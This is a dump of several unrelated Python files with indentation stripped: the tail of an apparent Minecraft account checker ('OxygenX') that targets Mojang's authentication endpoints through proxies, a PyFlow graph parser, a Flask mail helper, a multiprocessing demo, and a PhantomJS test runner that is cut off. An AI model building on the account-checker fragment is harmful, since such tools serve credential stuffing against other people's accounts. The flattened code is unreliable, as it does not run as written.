refresh = int(settings['OxygenX']['proxy']['api']['refresh_time'])
if __name__ == '__main__':
clear = lambda: system('cls' if name == 'nt' else 'clear')
init()
session = Session()
lock = Lock()
veltrankz = compile(r'<h2 style=\"color: .*\">(.*)</h2>')
rankhv = compile(r'class=\"rank.*\">(.*)<')
levelmp = compile(r'>Level (.*)</b>')
rankmp = compile(r'class=\"www-mp-rank\".*>(.*)</span>')
yellow = Fore.LIGHTYELLOW_EX
red = Fore.LIGHTRED_EX
green = Fore.LIGHTGREEN_EX
cyan = Fore.LIGHTCYAN_EX
blue = Fore.LIGHTBLUE_EX
white = Fore.LIGHTWHITE_EX
magenta = Fore.LIGHTMAGENTA_EX
agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'
scraper = create_scraper(sess=Session(), browser={'custom': agent})
mailheaders = {'user-agent': agent}
jsonheaders = {"Content-Type": "application/json", 'Pragma': 'no-cache'}
user_url = 'https://api.mojang.com/profiles/minecraft'
auth_mc = 'https://authserver.mojang.com/authenticate'
sfa_url = 'https://api.mojang.com/user/security/challenges'
charz = ['@', '!', '#', '$', '%', '^', '&', '*', ')', '(', '-', '}', '{', ']', '"', '+', '=', '?', '/',
'.', '>', ',', '<', '`', '\'', '~', '[', '\\', ' ']
# version = 'CN1.0'
set_title(f'OxygenX-{version} | by earthno1')
t = f'''{cyan}________ ____ ___
\_____ \ ___ ______.__. ____ ____ ____ \ \/ /
/ | \\\ \/ < | |/ ___\_/ __ \ / \ \ /
/ | \> < \___ / /_/ > ___/| | \/ \\
\_______ /__/\_ \/ ____\___ / \___ >___| /___/\ \\
\/ \/\/ /_____/ \/ \/ \_/
\n'''
if OxygenX.version_check:
checkforupdates()
Main()
|
graphUiParser.py | ## Copyright 2015-2019 Ilgar Lunin, Pedro Cabrera
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
## http://www.apache.org/licenses/LICENSE-2.0
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import os
import sys
import json
import threading
import time
from PySide2.QtWidgets import *
from PySide2 import QtGui
from PySide2 import QtCore
from PyFlow import INITIALIZE
from PyFlow.Core.Common import *
from PyFlow.Core.GraphManager import GraphManagerSingleton
from PyFlow.UI.Canvas.UINodeBase import getUINodeInstance
from PyFlow.UI.Utils.stylesheet import editableStyleSheet
from PyFlow.UI.Widgets.PropertiesFramework import CollapsibleFormWidget
import PyFlow.UI.resources
def run(filePath):
app = QApplication(sys.argv)
app.setStyle(QStyleFactory.create("plastique"))
app.setStyleSheet(editableStyleSheet().getStyleSheet())
msg = QMessageBox()
msg.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))
msg.setIcon(QMessageBox.Critical)
if os.path.exists(filePath):
with open(filePath, 'r') as f:
data = json.load(f)
# Window to display inputs
prop = QDialog()
prop.setLayout(QVBoxLayout())
prop.setWindowTitle(filePath)
prop.setWindowIcon(QtGui.QIcon(":/LogoBpApp.png"))
# Initialize packages
try:
INITIALIZE()
man = GraphManagerSingleton().get()
man.deserialize(data)
grph = man.findRootGraph()
inputs = grph.getNodesByClassName("graphInputs")
if len(inputs) > 0:
for inp in inputs:
uiNode = getUINodeInstance(inp)
uiNodeJsonTemplate = inp.serialize()
uiNodeJsonTemplate["wrapper"] = inp.wrapperJsonData
uiNode.postCreate(uiNodeJsonTemplate)
cat = CollapsibleFormWidget(headName=inp.name)
prop.layout().addWidget(cat)
cat = uiNode.createOutputWidgets(cat)
nodes = grph.getNodesList()
if len(nodes) > 0:
for node in nodes:
uiNode = getUINodeInstance(node)
uiNodeJsonTemplate = node.serialize()
uiNodeJsonTemplate["wrapper"] = node.wrapperJsonData
uiNode.postCreate(uiNodeJsonTemplate)
if uiNode.bExposeInputsToCompound:
cat = CollapsibleFormWidget(headName="{} inputs".format(node.name))
prop.layout().addWidget(cat)
uiNode.createInputWidgets(cat, pins=False)
prop.show()
def programLoop():
while True:
man.Tick(deltaTime=0.02)
time.sleep(0.02)
if man.terminationRequested:
break
t = threading.Thread(target=programLoop)
t.start()
def quitEvent():
man.terminationRequested = True
t.join()
app.aboutToQuit.connect(quitEvent)
# If no GraphInput Nodes Exit propgram
else:
msg.setInformativeText(filePath)
msg.setDetailedText("The file doesn't contain graphInputs nodes")
msg.setWindowTitle("PyFlow Ui Graph Parser")
msg.setStandardButtons(QMessageBox.Ok)
msg.show()
except Exception as e:
msg.setText("Error reading Graph")
msg.setInformativeText(filePath)
msg.setDetailedText(str(e))
msg.setWindowTitle("PyFlow Ui Graph Parser")
msg.setStandardButtons(QMessageBox.Ok)
msg.show()
else:
msg.setText("File Not Found")
msg.setInformativeText(filePath)
msg.setWindowTitle("PyFlow Ui Graph Parser")
msg.setStandardButtons(QMessageBox.Ok)
msg.show()
try:
sys.exit(app.exec_())
except Exception as e:
print(e)
|
email.py | from flask import Flask,render_template,current_app
from flask_mail import Message
from threading import Thread #导入线程
from .extensions import mail
def async_send_mail(app,msg):
#开启程序上下文
with app.app_context():
mail.send(message=msg) #发送邮件
def send_mail(subject,to,tem,**kwargs):
"""
:param subject: 邮件主题
:param to: 接收邮件的人
:param tem: 邮件的模板
:param kwargs: 给模板中传递的参数(变量)
:return: None
"""
app = current_app._get_current_object() #拿到实例化的app对象
msg = Message(subject=subject,recipients=[to],sender=app.config['MAIL_USERNAME'])
msg.html = render_template('email/'+tem+'.html',**kwargs)
thr = Thread(target=async_send_mail,args=(app,msg))
thr.start() #开启线程
|
003b_message_queue (005b).py | import multiprocessing
from time import sleep
def square_list(mylist, q):
print('From process p1 ... creating squared queue')
""" function to square a given list """
# append squares of mylist to queue
for num in mylist:
q.put(num * num)
print(f'Queue: {mylist[:]}\n')
def print_queue(q):
""" function to print queue elements """
print('From process p2 ... retriving squared queue')
print("Queue elements: ", end='')
while not q.empty():
print(q.get(), end=' ')
print("\nQueue is now empty!")
if __name__ == "__main__":
# input list
mylist = [1,2,3,4]
# creating multiprocessing Queue
q = multiprocessing.Queue()
# creating new processes
p1 = multiprocessing.Process(target=square_list, args=(mylist, q))
p2 = multiprocessing.Process(target=print_queue, args=(q,))
# running process p1 to square list
p1.start()
p1.join()
# running process p2 to get queue elements
p2.start()
p2.join()
|
run-tests.py | #!/usr/bin/env python
import argparse
import collections
import errno
import glob
import imp
import os
import platform
import posixpath
import re
import shlex
import SimpleHTTPServer
import socket
import SocketServer
import ssl
import string
import cStringIO as StringIO
import subprocess
import sys
import threading
import time
import traceback
import urllib
# All files matching one of these glob patterns will be run as tests.
TESTS = [
'basics/*.js',
'module/*/*.js',
'standards/*/*.js',
'regression/*.js',
]
TIMEOUT = 7 # Maximum duration of PhantomJS execution (in seconds).
# This is a backstop; testharness.js imposes a shorter
# timeout. Both can be increased if necessary.
#
# Utilities
#
# FIXME: assumes ANSI/VT100 escape sequences
# properly this should use curses, but that's an awful lot of work
# One of colors 30 ("black" -- usually a dark gray) and 37 ("white" --
# usually a very light gray) will almost certainly be illegible
# against the terminal background, so we provide neither.
# The colorization mode is global because so is sys.stdout.
_COLOR_NONE = {
"_": "", "^": "",
"r": "", "R": "",
"g": "", "G": "",
"y": "", "Y": "",
"b": "", "B": "",
"m": "", "M": "",
"c": "", "C": "",
}
_COLOR_ON = {
"_": "\033[0m", "^": "\033[1m",
"r": "\033[31m", "R": "\033[1;31m",
"g": "\033[32m", "G": "\033[1;32m",
"y": "\033[33m", "Y": "\033[1;33m",
"b": "\033[34m", "B": "\033[1;34m",
"m": "\033[35m", "M": "\033[1;35m",
"c": "\033[36m", "C": "\033[1;36m",
}
_COLOR_BOLD = {
"_": "\033[0m", "^": "\033[1m",
"r": "\033[0m", "R": "\033[1m",
"g": "\033[0m", "G": "\033[1m",
"y": "\033[0m", "Y": "\033[1m",
"b": "\033[0m", "B": "\033[1m",
"m": "\033[0m", "M": "\033[1m",
"c": "\033[0m", "C": "\033[1m",
}
_COLORS = None
def activate_colorization(options):
global _COLORS
if options.color == "always":
_COLORS = _COLOR_ON
elif options.color == "never":
_COLORS = _COLOR_NONE
else:
if sys.stdout.isatty() and platform.system() != "Windows":
try:
n = int(subprocess.check_output(["tput", "colors"]))
if n >= 8:
_COLORS = _COLOR_ON
else:
_COLORS = _COLOR_BOLD
except subprocess.CalledProcessError:
_COLORS = _COLOR_NONE
else:
_COLORS = _COLOR_NONE
def colorize(color, message):
return _COLORS[color] + message + _COLORS["_"]
# create_default_context and SSLContext were only added in 2.7.9,
# which is newer than the python2 that ships with OSX :-(
# The fallback tries to mimic what create_default_context(CLIENT_AUTH)
# does. Security obviously isn't important in itself for a test
# server, but making sure the PJS client can talk to a server
# configured according to modern TLS best practices _is_ important.
# Unfortunately, there is no way to set things like OP_NO_SSL2 or
# OP_CIPHER_SERVER_PREFERENCE prior to 2.7.9.
CIPHERLIST_2_7_9 = (
'ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:'
'!eNULL:!MD5:!DSS:!RC4'
)
def wrap_socket_ssl(sock, base_path):
crtfile = os.path.join(base_path, 'certs/https-snakeoil.crt')
keyfile = os.path.join(base_path, 'certs/https-snakeoil.key')
try:
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(crtfile, keyfile)
return ctx.wrap_socket(sock, server_side=True)
except AttributeError:
return ssl.wrap_socket(sock,
keyfile=keyfile,
certfile=crtfile,
server_side=True,
ciphers=CIPHERLIST_2_7_9)
# This should be in the standard library somewhere, but as far as I
# can tell, it isn't.
class ResponseHookImporter(object):
def __init__(self, www_path):
# All Python response hooks, no matter how deep below www_path,
# are treated as direct children of the fake "test_www" package.
if 'test_www' not in sys.modules:
imp.load_source('test_www', www_path + '/__init__.py')
self.tr = string.maketrans('-./%', '____')
def __call__(self, path):
modname = 'test_www.' + path.translate(self.tr)
try:
return sys.modules[modname]
except KeyError:
return imp.load_source(modname, path)
# This should also be in the standard library somewhere, and
# definitely isn't.
#
# FIXME: This currently involves *three* threads for every process,
# and a fourth if the process takes input. (On Unix, clever use of
# select() might be able to get that down to one, but zero is Hard.
# On Windows, we're hosed. 3.4's asyncio module would make everything
# better, but 3.4 is its own can of worms.)
try:
devnull = subprocess.DEVNULL
except:
devnull = os.open(os.devnull, os.O_RDONLY)
def do_call_subprocess(command, verbose, stdin_data, timeout):
def read_thread(linebuf, fp):
while True:
line = fp.readline().rstrip()
if not line: break # EOF
line = line.rstrip()
if line:
linebuf.append(line)
if verbose >= 3:
sys.stdout.write(line + '\n')
def write_thread(data, fp):
fp.writelines(data)
fp.close()
def reap_thread(proc, timed_out):
if proc.returncode is None:
proc.terminate()
timed_out[0] = True
class DummyThread:
def start(self): pass
def join(self): pass
if stdin_data:
stdin = subprocess.PIPE
else:
stdin = devnull
proc = subprocess.Popen(command,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if stdin_data:
sithrd = threading.Thread(target=write_thread,
args=(stdin_data, proc.stdin))
else:
sithrd = DummyThread()
stdout = []
stderr = []
timed_out = [False]
sothrd = threading.Thread(target=read_thread, args=(stdout, proc.stdout))
sethrd = threading.Thread(target=read_thread, args=(stderr, proc.stderr))
rpthrd = threading.Timer(timeout, reap_thread, args=(proc, timed_out))
sithrd.start()
sothrd.start()
sethrd.start()
rpthrd.start()
proc.wait()
if not timed_out[0]: rpthrd.cancel()
sithrd.join()
sothrd.join()
sethrd.join()
rpthrd.join()
if timed_out[0]:
stderr.append("TIMEOUT: Process terminated after {} seconds."
.format(timeout))
if verbose >= 3:
sys.stdout.write(stderr[-1] + "\n")
rc = proc.returncode
if verbose >= 3:
if rc < 0:
sys.stdout.write("## killed by signal {}\n".format(-rc))
else:
sys.stdout.write("## exit {}\n".format(rc))
return proc.returncode, stdout, stderr
#
# HTTP/HTTPS server, presented on localhost to the tests
#
class FileHandler(SimpleHTTPServer.SimpleHTTPRequestHandler, object):
def __init__(self, *args, **kwargs):
self._cached_untranslated_path = None
self._cached_translated_path = None
self.postdata = None
super(FileHandler, self).__init__(*args, **kwargs)
# silent, do not pollute stdout nor stderr.
def log_message(self, format, *args):
return
# accept POSTs, read the postdata and stash it in an instance variable,
# then forward to do_GET; handle_request hooks can vary their behavior
# based on the presence of postdata and/or the command verb.
def do_POST(self):
try:
ln = int(self.headers.get('content-length'))
except TypeError, ValueError:
self.send_response(400, 'Bad Request')
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write("No or invalid Content-Length in POST (%r)"
% self.headers.get('content-length'))
return
self.postdata = self.rfile.read(ln)
self.do_GET()
# allow provision of a .py file that will be interpreted to
# produce the response.
def send_head(self):
path = self.translate_path(self.path)
# do not allow direct references to .py(c) files,
# or indirect references to __init__.py
if (path.endswith('.py') or path.endswith('.pyc') or
path.endswith('__init__')):
self.send_error(404, 'File not found')
return None
if os.path.exists(path):
return super(FileHandler, self).send_head()
py = path + '.py'
if os.path.exists(py):
try:
mod = self.get_response_hook(py)
return mod.handle_request(self)
except:
self.send_error(500, 'Internal Server Error in '+py)
raise
self.send_error(404, 'File not found')
return None
# modified version of SimpleHTTPRequestHandler's translate_path
# to resolve the URL relative to the www/ directory
# (e.g. /foo -> test/www/foo)
def translate_path(self, path):
# Cache for efficiency, since our send_head calls this and
# then, in the normal case, the parent class's send_head
# immediately calls it again.
if (self._cached_translated_path is not None and
self._cached_untranslated_path == path):
return self._cached_translated_path
orig_path = path
# Strip query string and/or fragment, if present.
x = path.find('?')
if x != -1: path = path[:x]
x = path.find('#')
if x != -1: path = path[:x]
# Ensure consistent encoding of special characters, then
# lowercase everything so that the tests behave consistently
# whether or not the local filesystem is case-sensitive.
path = urllib.quote(urllib.unquote(path)).lower()
# Prevent access to files outside www/.
# At this point we want specifically POSIX-like treatment of 'path'
# because it is still a URL component and not a filesystem path.
# SimpleHTTPRequestHandler.send_head() expects us to preserve the
# distinction between paths with and without a trailing slash, but
# posixpath.normpath() discards that distinction.
trailing_slash = path.endswith('/')
path = posixpath.normpath(path)
while path.startswith('/'):
path = path[1:]
while path.startswith('../'):
path = path[3:]
# Now resolve the normalized, clamped path relative to the www/
# directory, according to local OS conventions.
path = os.path.normpath(os.path.join(self.www_path, *path.split('/')))
if trailing_slash:
# it must be a '/' even on Windows
path += '/'
self._cached_untranslated_path = orig_path
self._cached_translated_path = path
return path
class TCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# This is how you are officially supposed to set SO_REUSEADDR per
# https://docs.python.org/2/library/socketserver.html#SocketServer.BaseServer.allow_reuse_address
allow_reuse_address = True
def __init__(self, use_ssl, handler, base_path, signal_error):
SocketServer.TCPServer.__init__(self, ('localhost', 0), handler)
if use_ssl:
self.socket = wrap_socket_ssl(self.socket, base_path)
self._signal_error = signal_error
def handle_error(self, request, client_address):
# Ignore errors which can occur naturally if the client
# disconnects in the middle of a request. EPIPE and
# ECONNRESET *should* be the only such error codes
# (according to the OSX manpage for send()).
_, exval, _ = sys.exc_info()
if getattr(exval, 'errno', None) in (errno.EPIPE, errno.ECONNRESET):
return
# Otherwise, report the error to the test runner.
self._signal_error(sys.exc_info())
class HTTPTestServer(object):
def __init__(self, base_path, signal_error, verbose):
self.httpd = None
self.httpsd = None
self.base_path = base_path
self.www_path = os.path.join(base_path, 'www')
self.signal_error = signal_error
self.verbose = verbose
def __enter__(self):
handler = FileHandler
handler.extensions_map.update({
'.htm': 'text/html',
'.html': 'text/html',
'.css': 'text/css',
'.js': 'application/javascript',
'.json': 'application/json'
})
handler.www_path = self.www_path
handler.get_response_hook = ResponseHookImporter(self.www_path)
self.httpd = TCPServer(False, handler,
self.base_path, self.signal_error)
os.environ['TEST_HTTP_BASE'] = \
'http://localhost:{}/'.format(self.httpd.server_address[1])
httpd_thread = threading.Thread(target=self.httpd.serve_forever)
httpd_thread.daemon = True
httpd_thread.start()
if self.verbose >= 3:
sys.stdout.write("## HTTP server at {}\n".format(
os.environ['TEST_HTTP_BASE']))
self.httpsd = TCPServer(True, handler,
self.base_path, self.signal_error)
os.environ['TEST_HTTPS_BASE'] = \
'https://localhost:{}/'.format(self.httpsd.server_address[1])
httpsd_thread = threading.Thread(target=self.httpsd.serve_forever)
httpsd_thread.daemon = True
httpsd_thread.start()
if self.verbose >= 3:
sys.stdout.write("## HTTPS server at {}\n".format(
os.environ['TEST_HTTPS_BASE']))
return self
def __exit__(self, *dontcare):
self.httpd.shutdown()
del os.environ['TEST_HTTP_BASE']
self.httpsd.shutdown()
del os.environ['TEST_HTTPS_BASE']
#
# Running tests and interpreting their results
#
class TestDetailCode(collections.namedtuple("TestDetailCode", (
"idx", "color", "short_label", "label", "long_label"))):
def __index__(self): return self.idx
def __hash__(self): return self.idx
def __eq__(self, other): return self.idx == other.idx
def __ne__(self, other): return self.idx != other.idx
class T(object):
PASS = TestDetailCode(0, "g", ".", "pass", "passed")
FAIL = TestDetailCode(1, "R", "F", "FAIL", "failed")
XFAIL = TestDetailCode(2, "y", "f", "xfail", "failed as expected")
XPASS = TestDetailCode(3, "Y", "P", "XPASS", "passed unexpectedly")
ERROR = TestDetailCode(4, "R", "E", "ERROR", "had errors")
SKIP = TestDetailCode(5, "m", "s", "skip", "skipped")
UNSUPPORTED = TestDetailCode(6, "y", "u", "unsupported", "unsupported")
MAX = 7
class TestDetail(object):
"""Holds one block of details about a test that failed."""
# types of details:
def __init__(self, message, test_id, detail_type):
if not isinstance(message, list):
message = [message]
self.message = [line.rstrip()
for chunk in message
for line in chunk.split("\n")]
self.dtype = detail_type
self.test_id = test_id
def report(self, fp):
col, label = self.dtype.color, self.dtype.label
if self.test_id:
fp.write("{:>5}: {}\n".format(colorize(col, label),
self.test_id))
lo = 0
else:
fp.write("{:>5}: {}\n".format(colorize(col, label),
self.message[0]))
lo = 1
for line in self.message[lo:]:
fp.write(" {}\n".format(colorize("b", line)))
class TestGroup(object):
"""Holds the result of one group of tests (that is, one .js file),
parsed from the output of run_phantomjs (see below).
Subclasses specify what the output means.
A test with zero details is considered to be successful.
"""
def __init__(self, name):
self.name = name
self.n = [0]*T.MAX
self.details = []
def parse(self, rc, out, err):
raise NotImplementedError
def _add_d(self, message, test_id, dtype):
self.n[dtype] += 1
self.details.append(TestDetail(message, test_id, dtype))
def add_pass (self, m, t): self._add_d(m, t, T.PASS)
def add_fail (self, m, t): self._add_d(m, t, T.FAIL)
def add_xpass(self, m, t): self._add_d(m, t, T.XPASS)
def add_xfail(self, m, t): self._add_d(m, t, T.XFAIL)
def add_error(self, m, t): self._add_d(m, t, T.ERROR)
def add_skip (self, m, t): self._add_d(m, t, T.SKIP)
def add_unsupported (self, m, t): self._add_d(m, t, T.UNSUPPORTED)
def default_interpret_exit_code(self, rc):
if rc == 0:
if not self.is_successful() and not self.n[T.ERROR]:
self.add_error([],
"PhantomJS exited successfully when test failed")
# Exit code -15 indicates a timeout.
elif rc == 1 or rc == -15:
if self.is_successful():
self.add_error([], "PhantomJS exited unsuccessfully")
elif rc >= 2:
self.add_error([], "PhantomJS exited with code {}".format(rc))
else:
self.add_error([], "PhantomJS killed by signal {}".format(-rc))
def is_successful(self):
return self.n[T.FAIL] + self.n[T.XPASS] + self.n[T.ERROR] == 0
def worst_code(self):
# worst-to-best ordering
for code in (T.ERROR, T.FAIL, T.XPASS, T.SKIP, T.XFAIL, T.PASS, T.UNSUPPORTED):
if self.n[code] > 0:
return code
return T.PASS
def one_char_summary(self, fp):
code = self.worst_code()
fp.write(colorize(code.color, code.short_label))
fp.flush()
def line_summary(self, fp):
code = self.worst_code()
fp.write("{}: {}\n".format(colorize("^", self.name),
colorize(code.color, code.label)))
def report(self, fp, show_all):
self.line_summary(fp)
need_blank_line = False
for detail in self.details:
if show_all or detail.dtype not in (T.PASS, T.XFAIL, T.SKIP):
detail.report(fp)
need_blank_line = True
if need_blank_line:
fp.write("\n")
def report_for_verbose_level(self, fp, verbose):
if verbose == 0:
self.one_char_summary(sys.stdout)
elif verbose == 1:
self.report(sys.stdout, False)
else:
self.report(sys.stdout, True)
class UnsupportedTestGroup(TestGroup):
"""Test group which is currently unsupported and should
be skipped altogether.
"""
def __init__(self, name):
TestGroup.__init__(self, name)
self.add_unsupported('', 'Skipping the whole file');
class ExpectTestGroup(TestGroup):
"""Test group whose output must be exactly as specified by directives
in the file. This is how you test for an _unsuccessful_ exit code,
or for output appearing on a specific one of stdout/stderr.
"""
def __init__(self, name, rc_exp, stdout_exp, stderr_exp,
rc_xfail, stdout_xfail, stderr_xfail):
TestGroup.__init__(self, name)
if rc_exp is None: rc_exp = 0
self.rc_exp = rc_exp
self.stdout_exp = stdout_exp
self.stderr_exp = stderr_exp
self.rc_xfail = rc_xfail
self.stdout_xfail = stdout_xfail
self.stderr_xfail = stderr_xfail
def parse(self, rc, out, err):
self.parse_output("stdout", self.stdout_exp, out, self.stdout_xfail)
self.parse_output("stderr", self.stderr_exp, err, self.stderr_xfail)
exit_msg = ["expected exit code {} got {}"
.format(self.rc_exp, rc)]
if rc != self.rc_exp:
exit_desc = "did not exit as expected"
if self.rc_xfail:
self.add_xfail(exit_msg, exit_desc)
else:
self.add_fail(exit_msg, exit_desc)
else:
exit_desc = "exited as expected"
if self.rc_xfail:
self.add_xpass(exit_msg, exit_desc)
else:
self.add_pass(exit_msg, exit_desc)
def parse_output(self, what, exp, got, xfail):
diff = []
le = len(exp)
lg = len(got)
for i in range(max(le, lg)):
e = ""
g = ""
if i < le: e = exp[i]
if i < lg: g = got[i]
if e != g:
diff.extend(("{}: line {} not as expected".format(what, i+1),
"-" + repr(e)[1:-1],
"+" + repr(g)[1:-1]))
if diff:
desc = what + " not as expected"
if xfail:
self.add_xfail(diff, desc)
else:
self.add_fail(diff, desc)
else:
desc = what + " as expected"
if xfail:
self.add_xpass(diff, desc)
else:
self.add_pass(diff, desc)
class TAPTestGroup(TestGroup):
"""Test group whose output is interpreted according to a variant of the
Test Anything Protocol (http://testanything.org/tap-specification.html).
Relative to that specification, these are the changes:
* Plan-at-the-end, explanations for directives, and "Bail out!"
are not supported. ("1..0 # SKIP: explanation" *is* supported.)
* "Anything else" lines are an error.
* Repeating a test point number, or using one outside the plan
range, is an error (this is unspecified in TAP proper).
* Diagnostic lines beginning with # are taken as additional
information about the *next* test point. Diagnostic lines
beginning with ## are ignored.
* Directives are case sensitive.
"""
diag_r = re.compile(r"^#(#*)\s*(.*)$")
plan_r = re.compile(r"^1..(\d+)(?:\s*\#\s*SKIP(?::\s*(.*)))?$")
test_r = re.compile(r"^(not ok|ok)\s*"
r"([0-9]+)?\s*"
r"([^#]*)(?:# (TODO|SKIP))?$")
def parse(self, rc, out, err):
self.parse_tap(out, err)
self.default_interpret_exit_code(rc)
def parse_tap(self, out, err):
points_already_used = set()
messages = []
# Look for the plan.
# Diagnostic lines are allowed to appear above the plan, but not
# test lines.
for i in range(len(out)):
line = out[i]
m = self.diag_r.match(line)
if m:
if not m.group(1):
messages.append(m.group(2))
continue
m = self.plan_r.match(line)
if m:
break
messages.insert(0, line)
self.add_error(messages, "Plan line not interpretable")
if i + 1 < len(out):
self.add_skip(out[(i+1):], "All further output ignored")
return
else:
self.add_error(messages, "No plan line detected in output")
return
max_point = int(m.group(1))
if max_point == 0:
if any(msg.startswith("ERROR:") for msg in messages):
self.add_error(messages, m.group(2) or "Test group skipped")
else:
self.add_skip(messages, m.group(2) or "Test group skipped")
if i + 1 < len(out):
self.add_skip(out[(i+1):], "All further output ignored")
return
prev_point = 0
for i in range(i+1, len(out)):
line = out[i]
m = self.diag_r.match(line)
if m:
if not m.group(1):
messages.append(m.group(2))
continue
m = self.test_r.match(line)
if m:
status = m.group(1)
point = m.group(2)
desc = m.group(3)
dirv = m.group(4)
if point:
point = int(point)
else:
point = prev_point + 1
if point in points_already_used:
# A reused test point is an error.
self.add_error(messages, desc + " [test point repeated]")
else:
points_already_used.add(point)
# A point above the plan limit is an automatic *fail*.
# The test suite relies on this in testing exit().
if point > max_point:
status = "not ok"
if status == "ok":
if not dirv:
self.add_pass(messages, desc)
elif dirv == "TODO":
self.add_xpass(messages, desc)
elif dirv == "SKIP":
self.add_skip(messages, desc)
else:
self.add_error(messages, desc +
" [ok, with invalid directive "+dirv+"]")
else:
if not dirv:
self.add_fail(messages, desc)
elif dirv == "TODO":
self.add_xfail(messages, desc)
else:
self.add_error(messages, desc +
" [not ok, with invalid directive "+dirv+"]")
del messages[:]
prev_point = point
else:
self.add_error([line], "neither a test nor a diagnostic")
# Any output on stderr is an error, with one exception: the timeout
# message added by record_process_output, which is treated as an
# unnumbered "not ok".
if err:
if len(err) == 1 and err[0].startswith("TIMEOUT: "):
points_already_used.add(prev_point + 1)
self.add_fail(messages, err[0][len("TIMEOUT: "):])
else:
self.add_error(err, "Unexpected output on stderr")
# Any missing test points are fails.
for pt in range(1, max_point+1):
if pt not in points_already_used:
self.add_fail([], "test {} did not report status".format(pt))
class TestRunner(object):
def __init__(self, base_path, phantomjs_exe, options):
self.base_path = base_path
self.cert_path = os.path.join(base_path, 'certs')
self.harness = os.path.join(base_path, 'testharness.js')
self.phantomjs_exe = phantomjs_exe
self.verbose = options.verbose
self.debugger = options.debugger
self.to_run = options.to_run
self.run_unsupported = options.run_unsupported
self.server_errs = []
def signal_server_error(self, exc_info):
self.server_errs.append(exc_info)
def get_base_command(self, debugger):
if debugger is None:
return ["node", self.phantomjs_exe]
elif debugger == "gdb":
return ["gdb", "--args", "node", self.phantomjs_exe]
elif debugger == "lldb":
return ["lldb", "--", "node", self.phantomjs_exe]
elif debugger == "valgrind":
return ["valgrind", "node", self.phantomjs_exe]
else:
raise RuntimeError("Don't know how to invoke " + self.debugger)
def run_phantomjs(self, script,
script_args=[], pjs_args=[], stdin_data=[],
timeout=TIMEOUT, silent=False):
verbose = self.verbose
debugger = self.debugger
if silent:
verbose = False
debugger = None
output = []
command = self.get_base_command(debugger)
command.extend(pjs_args)
command.append(script)
if verbose:
command.append('--verbose={}'.format(verbose))
command.extend(script_args)
if verbose >= 3:
sys.stdout.write("## running {}\n".format(" ".join(command)))
if debugger:
# FIXME: input-feed mode doesn't work with a debugger,
# because how do you tell the debugger that the *debuggee*
# needs to read from a pipe?
subprocess.call(command)
return 0, [], []
else:
return do_call_subprocess(command, verbose, stdin_data, timeout)
def run_test(self, script, name):
script_args = []
pjs_args = []
use_harness = True
use_snakeoil = False
stdin_data = []
stdout_exp = []
stderr_exp = []
rc_exp = None
stdout_xfail = False
stderr_xfail = False
rc_xfail = False
timeout = TIMEOUT
unsupported = False
def require_args(what, i, tokens):
if i+1 == len(tokens):
raise ValueError(what + "directive requires an argument")
if self.verbose >= 3:
sys.stdout.write(colorize("^", name) + ":\n")
# Parse any directives at the top of the script.
try:
with open(script, "rt") as s:
for line in s:
if not line.startswith("//!"):
break
tokens = shlex.split(line[3:], comments=True)
skip = False
for i in range(len(tokens)):
if skip:
skip = False
continue
tok = tokens[i]
if tok == "unsupported":
unsupported = True
elif tok == "no-harness":
use_harness = False
elif tok == "snakeoil":
use_snakeoil = True
elif tok == "expect-exit-fails":
rc_xfail = True
elif tok == "expect-stdout-fails":
stdout_xfail = True
elif tok == "expect-stderr-fails":
stderr_xfail = True
elif tok == "timeout:":
require_args(tok, i, tokens)
timeout = float(tokens[i+1])
if timeout <= 0:
raise ValueError("timeout must be positive")
skip = True
elif tok == "expect-exit:":
require_args(tok, i, tokens)
rc_exp = int(tokens[i+1])
skip = True
elif tok == "phantomjs:":
require_args(tok, i, tokens)
pjs_args.extend(tokens[(i+1):])
break
elif tok == "script:":
require_args(tok, i, tokens)
script_args.extend(tokens[(i+1):])
break
elif tok == "stdin:":
require_args(tok, i, tokens)
stdin_data.append(" ".join(tokens[(i+1):]) + "\n")
break
elif tok == "expect-stdout:":
require_args(tok, i, tokens)
stdout_exp.append(" ".join(tokens[(i+1):]))
break
elif tok == "expect-stderr:":
require_args(tok, i, tokens)
stderr_exp.append(" ".join(tokens[(i+1):]))
break
else:
raise ValueError("unrecognized directive: " + tok)
except Exception as e:
grp = TestGroup(name)
if hasattr(e, 'strerror') and hasattr(e, 'filename'):
grp.add_error([], '{} ({}): {}\n'
.format(name, e.filename, e.strerror))
else:
grp.add_error([], '{} ({}): {}\n'
.format(name, script, str(e)))
return grp
if use_harness:
script_args.insert(0, script)
script = self.harness
if use_snakeoil:
pjs_args.insert(0, '--ssl-certificates-path=' + self.cert_path)
if unsupported and not self.run_unsupported:
return UnsupportedTestGroup(name)
rc, out, err = self.run_phantomjs(script, script_args, pjs_args,
stdin_data, timeout)
if rc_exp or stdout_exp or stderr_exp:
grp = ExpectTestGroup(name,
rc_exp, stdout_exp, stderr_exp,
rc_xfail, stdout_xfail, stderr_xfail)
else:
grp = TAPTestGroup(name)
grp.parse(rc, out, err)
return grp
def run_tests(self):
start = time.time()
base = self.base_path
nlen = len(base) + 1
results = []
for test_glob in TESTS:
test_glob = os.path.join(base, test_glob)
for test_script in sorted(glob.glob(test_glob)):
tname = os.path.splitext(test_script)[0][nlen:]
if self.to_run:
for to_run in self.to_run:
if to_run in tname:
break
else:
continue
any_executed = True
grp = self.run_test(test_script, tname)
grp.report_for_verbose_level(sys.stdout, self.verbose)
results.append(grp)
grp = TestGroup("HTTP server errors")
for ty, val, tb in self.server_errs:
grp.add_error(traceback.format_tb(tb, 5),
traceback.format_exception_only(ty, val)[-1])
